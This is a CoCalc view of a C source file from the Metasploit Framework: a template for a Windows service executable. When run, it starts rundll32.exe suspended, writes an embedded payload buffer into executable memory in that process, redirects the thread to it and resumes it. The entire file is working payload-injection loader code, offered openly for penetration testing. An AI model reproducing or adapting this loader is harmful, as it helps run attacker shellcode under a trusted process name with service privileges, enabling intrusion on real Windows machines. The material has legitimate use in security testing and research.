CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/data/templates/src/pe/exe/service/service.c
Views: 11791
1
#define WIN32_LEAN_AND_MEAN

2
#include <windows.h>

3


4
#define PAYLOAD_SIZE	8192

5


6
char cServiceName[32] = "SERVICENAME";

7


8
char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";

9


10
SERVICE_STATUS ss;

11


12
SERVICE_STATUS_HANDLE hStatus = NULL;

13


14
/*

15
 *

16
 */

17
BOOL ServiceHandler( DWORD dwControl )

18
{

19
	if( dwControl == SERVICE_CONTROL_STOP || dwControl == SERVICE_CONTROL_SHUTDOWN )

20
	{

21
		ss.dwWin32ExitCode = 0;

22
		ss.dwCurrentState  = SERVICE_STOPPED;

23
	}

24
	return SetServiceStatus( hStatus, &ss );

25
}

26


27
/*

28
 *

29
 */

30
VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )

31
{

32
	CONTEXT Context;

33
	STARTUPINFO si;

34
	PROCESS_INFORMATION pi;

35
	LPVOID lpPayload = NULL;

36


37
	ZeroMemory( &ss, sizeof(SERVICE_STATUS) );

38
	ZeroMemory( &si, sizeof(STARTUPINFO) );

39
	ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );

40


41
	si.cb = sizeof(STARTUPINFO);

42


43
	ss.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;

44


45
	ss.dwCurrentState = SERVICE_START_PENDING;

46


47
	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

48


49
	hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );

50
  

51
	if ( hStatus )

52
	{

53
		ss.dwCurrentState = SERVICE_RUNNING;

54


55
		SetServiceStatus( hStatus, &ss );

56


57
		if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )

58
		{

59
			Context.ContextFlags = CONTEXT_FULL;

60
		  

61
			GetThreadContext( pi.hThread, &Context );

62
		  

63
			lpPayload = VirtualAllocEx( pi.hProcess, NULL, PAYLOAD_SIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );

64
			if( lpPayload )

65
			{

66
				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );

67
#ifdef _WIN64

68
				Context.Rip = (DWORD64)lpPayload;

69
#else

70
				Context.Eip = (DWORD)lpPayload;

71
#endif

72
				SetThreadContext( pi.hThread, &Context );

73
			}

74


75
			ResumeThread( pi.hThread );

76
			

77
			CloseHandle( pi.hThread );

78
		  

79
			CloseHandle( pi.hProcess );

80
		}

81
		

82
		ServiceHandler( SERVICE_CONTROL_STOP );

83
		

84
		ExitProcess( 0 );

85
	}

86
}

87


88
/*

89
 *

90
 */

91
int __stdcall WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )

92
{

93
	SERVICE_TABLE_ENTRY st[] = 

94
    { 

95
        { (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain }, 

96
        { NULL, NULL } 

97
    };

98
	return StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );

99
}

100


101